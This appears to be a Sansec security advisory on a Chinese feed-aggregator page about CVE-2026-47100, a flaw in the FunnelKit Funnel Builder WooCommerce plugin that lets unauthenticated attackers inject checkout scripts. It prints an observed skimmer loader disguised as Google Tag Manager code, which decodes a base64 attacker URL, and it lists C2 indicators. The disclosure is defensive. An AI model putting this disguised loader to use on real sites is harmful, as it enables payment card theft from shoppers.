惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

G
Google Developers Blog
D
Docker
Stack Overflow Blog
Stack Overflow Blog
GbyAI
GbyAI
OSCHINA 社区最新新闻
OSCHINA 社区最新新闻
Google DeepMind News
Google DeepMind News
M
MIT News - Artificial intelligence
H
Help Net Security
T
Tailwind CSS Blog
Engineering at Meta
Engineering at Meta
L
LangChain Blog
MongoDB | Blog
MongoDB | Blog
腾讯CDC
H
Hackread – Cybersecurity News, Data Breaches, AI and More
S
SegmentFault 最新的问题
博客园 - 司徒正美
C
Check Point Blog
B
Blog
Y
Y Combinator Blog
Microsoft Azure Blog
Microsoft Azure Blog
P
Proofpoint News Feed
F
Fortinet All Blogs
美团技术团队
D
DataBreaches.Net

Sansec - experts in eCommerce security

GorgonAgora: 4,800+ fake storefronts skim cards across hundreds of impersonated brands Sansec adds support for Sylius 1 & 2 Critical vulnerability in Mirasvit Cache Warmer for Magento Composer vulnerability leaks GitHub tokens, threatens PHP supply chain Over 200 PrestaShop stores expose installer, allowing full takeover ClickFix malware hits DoD cybersecurity vendor homepage SVG Onload Tag Hides Magecart Skimmer on 99 Stores Mass PolyShell attack wave hits 471 stores in one hour Novel WebRTC skimmer bypasses security controls at $100+ billion car maker PolyShell: unrestricted file upload in Magento and Adobe Commerce Digital skimmer hits global supermarket chain Building a faster YARA engine in pure Go Magento Developers Impersonated in Targeted GitHub Malware Operation Claude finds 353 zero-days on Packagist The billion-dollar security.txt problem Keylogger targets 200,000+ employees at major US bank ConnectPOS leaked Github secrets for years Critical backdoor found in MGT Varnish extension SessionReaper attacks have started, 3 in 5 stores still vulnerable SessionReaper, unauthenticated RCE in Magento & Adobe Commerce (CVE-2025-54236) Adobe patches critical Magento admin takeover via menu injection Backdoor found in popular ecommerce components Found defunct.dat on your site? You've got a problem. You have 2 weeks left to set up CSP for your store Merchants left guessing at last-minute PCI-DSS u-turn Magento Security Release APSB25-08 [Impact Analysis] Sorry, client-side security does not work Google services abused in skimming campaigns Thousands of Adobe Commerce stores hacked in competing CosmicSting campaigns CosmicSting attack & defense overview
Critical FunnelKit vulnerability threatens 40,000+ WooCom...
Sansec Forensics Team · 2026-05-14 · via Sansec - experts in eCommerce security

Sansec is tracking active attacks against Funnel Builder by FunnelKit, a checkout and upsell plugin used on 40,000+ WooCommerce stores. All versions before 3.15.0.3 let unauthenticated attackers inject arbitrary JavaScript into every checkout page on the store.

Attackers are planting fake Google Tag Manager scripts into the plugin's "External Scripts" setting. The injected code looks like ordinary analytics next to the store's real tags, but loads a payment skimmer that steals credit card numbers, CVVs and billing addresses from checkout.

FunnelKit has shipped a patched version and is asking all customers to update.

The vulnerability

The flaw is tracked as CVE-2026-47100, rated 8.7 (high) on CVSS 4.0.

Funnel Builder includes a public checkout endpoint that lets the request pick which internal method to run. Older releases never check the caller's permissions or restrict which methods are allowed.

An unauthenticated request can therefore reach the internal method that writes attacker-controlled data straight into the plugin's global settings. Whatever sits in the "External Scripts" setting then gets printed onto every Funnel Builder checkout page, so an attacker can plant a <script> tag that runs on every checkout transaction across the site.

The patch adds the missing capability check and locks the endpoint down to an allow-list of safe methods. Patch details are in the changeset on WordPress.org.

Observed exploitation

In at least one case, Sansec found a payload posing as a Google Tag Manager loader, sitting next to the store's legitimate marketing tags:

(function (i, s, o, g, r) {
  window.addEventListener("load", function () {
    a = s.createElement(o);
    a.async = 1;
    a.src = atob(r);
    s.body.appendChild(a);
  });
})(window, document, "script", "www.google-analytics.com/analytics.js", "aHR0cHM6Ly9hbmFseXRpY3MtcmVwb3J0cy5jb20vd3NzL2pxdWVyeS1saWIuanM=");

On page load, the script decodes the base64 string at the end and loads it as an external script: https://analytics-reports[.]com/wss/jquery-lib.js.

That loader opens a WebSocket to the attacker's C2 at wss://protect-wss[.]com/ws, which streams back a skimmer tailored to the victim store. The skimmer steals credit card numbers, CVVs, billing addresses and other personal details at checkout.

Dressing skimmers up as Google Analytics or Tag Manager code is a recurring Magecart pattern, since reviewers tend to skim straight past anything that looks like a familiar tracking tag.

Vendor response

FunnelKit told Sansec it took several steps after the first report:

  • Released a fix within 36 hours.
  • Sent a security advisory to all users.
  • Worked with the WordPress.org plugin team to push the patch to older release branches automatically, so many stores were updated without manual action.
  • Reported and DNS-blocked the attacker domains known to it.

What to do

FunnelKit's own advisory to customers reads:

We've just released an important security update for Funnel Builder 3.15.0.3 that needs to be updated on your site. We identified an issue that allowed bad actors to inject scripts.

As a precaution, we'd recommend two quick steps:

  1. Update FunnelKit plugins to the latest version from your WordPress dashboard.
  2. Take a moment to review your Settings > Checkout > External Scripts (or other script settings) & remove any script that looks unfamiliar.

On top of FunnelKit's advice, run eComscan. It detects this skimmer along with other malware, backdoors and vulnerabilities that may already be on your store.

Indicators of Compromise

analytics-reports[.]com/wss/jquery-lib.js
wss://protect-wss[.]com/ws

Read more